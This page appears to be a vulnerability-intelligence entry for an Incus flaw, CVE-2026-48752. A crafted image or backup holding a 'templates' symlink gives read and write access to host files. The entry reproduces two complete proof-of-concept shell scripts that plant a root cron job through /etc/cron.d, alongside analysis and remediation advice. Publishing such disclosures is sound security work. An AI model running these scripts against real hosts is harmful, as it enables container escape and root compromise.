Skip to main content

Incus CVE-2026-48752

CRITICAL
External Control of File Name or Path (CWE-73)
2026-06-26 https://github.com/lxc/incus GHSA-vxp5-584q-c479
9.9
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.9 CRITICAL

Requires authenticated import privileges (PR:L) over the network API (AV:N), reliable symlink trick (AC:L), and escapes the container/storage context to write host files as root (S:C, C/I/A:H).

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 26, 2026 - 19:22 vuln.today
Analysis Generated
Jun 26, 2026 - 19:22 vuln.today
CVE Published
Jun 26, 2026 - 18:46 github-advisory
CRITICAL 9.9

DescriptionGitHub Advisory

Summary

A specially crafted image or instance backup can be used to read or create/write arbitrary files on the host; possibly leading to arbitrary command execution.

Details

For container images, internal/server/storage/utils.go calls archive.Unpack(imageFile, destPath, ...). The tar extraction path in shared/archive/archive.go excludes device nodes, but it does not reject a top-level templates symlink.

For instance backups, internal/server/storage/drivers/driver_dir_volumes.go:rsync.LocalCopy uses argument -a (archive mode), but does not add --safe-links. This allows a top-level templates symlink.

In practice, this allows a malicious actor to access an arbitrary directory and edit arbitrary files in it.

PoC

Malicious container image

Below, the templates directory is mapped to /etc/cron.d on the host, but it can be mapped anywhere. After that, create a cronjob to run id as root.

#!/bin/sh
set -eu

tmpdir=$(mktemp -d)
cleanup() {
    rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP

mkdir -p "${tmpdir}/img/rootfs"
ln -s /etc/cron.d "${tmpdir}/img/templates"
cat<<__EOF__>"${tmpdir}/img/metadata.yaml"
architecture: x86_64
creation_date: 1
properties:
  description: PoC templates symlink host afrw
__EOF__

cd "${tmpdir}/img"
tar --owner=0 --group=0 -f- -c * >../afrw-image-templates-symlink.tar
incus image import ../afrw-image-templates-symlink.tar --alias afrw-image-templates-symlink
incus init afrw-image-templates-symlink afrw-image-templates-symlink

incus config template ls afrw-image-templates-symlink
# read
#incus config template show afrw-image-templates-symlink $FILENAME
# write
printf "* * * * * root sh -c 'id>/pwned'\n" | incus config template create afrw-image-templates-symlink poc-32
#incus config template edit afrw-image-templates-symlink poc
Malicious instance backup

Below, the templates directory is mapped to /etc/cron.d on the host, but it can be mapped anywhere. After that, create a cronjob to run id as root.

#!/bin/sh
set -eu

tmpdir=$(mktemp -d)
cleanup() {
    rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP

mkdir -p "${tmpdir}/img/backup"
cat<<__EOF__>"${tmpdir}/img/backup/index.yaml"
name: afrw-backup-templates-symlink
backend: dir
pool: default
type: container
optimized: false
__EOF__

mkdir "${tmpdir}/img/backup/container"
cat<<__EOF__>"${tmpdir}/img/backup/container/backup.yaml"
container:
  name: afrw-backup-templates-symlink
  architecture: x86_64
  type: container
  status: Stopped
  status_code: 102
  stateful: false
  ephemeral: false
  profiles:
    - default
  config:
    volatile.uuid: 58a0f7de-2490-4e85-9fb2-153ef0fc7be5
    volatile.uuid.generation: 24d829e5-d74a-4285-88c0-be369140fb49
  expanded_config:
    volatile.uuid: 58a0f7de-2490-4e85-9fb2-153ef0fc7be5
    volatile.uuid.generation: 24d829e5-d74a-4285-88c0-be369140fb49
  devices: {}
  expanded_devices:
    root:
      path: /
      pool: default
      type: disk
  created_at: "2024-01-01T00:00:00Z"
  last_used_at: "2024-01-01T00:00:00Z"
volume:
  name: afrw-backup-templates-symlink
  type: container
  content_type: filesystem
  config: {}
pool:
  name: default
  driver: dir
  config: {}
__EOF__

cat<<__EOF__>"${tmpdir}/img/backup/container/metadata.yaml"
architecture: x86_64
creation_date: 1
properties:
  description: afrw-backup-templates-symlink
__EOF__

mkdir "${tmpdir}/img/backup/container/rootfs"
ln -s /etc/cron.d "${tmpdir}/img/backup/container/templates"

cd "${tmpdir}/img"
tar --owner=0 --group=0 -f- -c backup >../afrw-backup-templates-symlink.tar
incus import ../afrw-backup-templates-symlink.tar afrw-backup-templates-symlink

incus config template ls afrw-backup-templates-symlink
# read
#incus config template show afrw-backup-templates-symlink $FILENAME
# write
printf "* * * * * root sh -c 'id>/pwned'\n" | incus config template create afrw-backup-templates-symlink poc-32
#incus config template edit afrw-templates-symlink poc

Impact

Arbitrary file read and write on the host via unsanitized symlink; possibly leading to command execution.

AnalysisAI

Arbitrary host file read and write in Incus (the LXC/LXD container and VM manager) before version 7.2.0 allows a user who can import a crafted container image or instance backup to escape into the host filesystem via an unsanitized top-level templates symlink, possibly escalating to root command execution. The flaw stems from tar/rsync extraction routines that exclude device nodes but fail to reject symlinks pointing outside the target directory. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain Incus import privileges
Delivery
Craft image/backup with top-level templates symlink
Exploit
Import malicious image or backup
Execution
Daemon follows symlink to host path
Persist
Write cron job via config template
Impact
Cron executes payload as root

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to have authenticated access to an Incus server with permission to import a container image (`incus image import` / `incus init`) or an instance backup (`incus import`), per the CVSS PR:L. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The supplied CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9 Critical) reflects low attack complexity, a scope change (container-to-host), and full CIA impact, which is consistent with the described primitive (arbitrary file read/write as the root-running daemon). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A tenant or user with permission to import images crafts a tarball containing a top-level `templates` symlink pointing at `/etc/cron.d`, imports it with `incus image import` (or imports a malicious instance backup with `incus import`), then uses `incus config template create` to write a cron job that runs `id` (or any command) as root on the host. Because a full working PoC is published in the advisory, exploitation is low-effort given import access, and the low attack complexity (AC:L) means no special timing or environmental conditions are needed.
Remediation Upgrade to Incus 7.2.0 or later (Vendor-released patch: 7.2.0), per GHSA-vxp5-584q-c479 (https://github.com/lxc/incus/security/advisories/GHSA-vxp5-584q-c479). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Audit all Incus installations (particularly versions before 7.2.0) and identify users/services with image/backup import permissions; immediately restrict imports to fully trusted sources only and consider temporarily disabling import functionality if operationally feasible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-48752 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy